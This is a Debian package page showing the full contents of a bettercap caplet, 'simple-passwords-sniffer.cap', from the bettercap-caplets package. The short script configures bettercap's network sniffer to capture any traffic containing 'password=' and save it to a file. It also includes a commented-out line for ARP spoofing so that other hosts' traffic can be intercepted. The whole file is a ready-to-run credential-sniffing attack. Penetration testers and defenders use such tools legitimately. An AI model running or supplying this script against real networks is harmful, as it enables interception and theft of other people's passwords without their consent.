File: simple-passwords-sniffer.cap

package info (click to toggle)
bettercap-caplets 0%2Bgit20240106-2
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid, trixie
  • size: 1,028 kB
  • sloc: javascript: 2,112; sh: 29; makefile: 8; python: 1
file content (10 lines) | stat: -rw-r--r-- 131 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
set net.sniff.regexp .*password=.+
set net.sniff.output passwords.cap

# start arp spoofing attack
# arp.spoof on
net.sniff on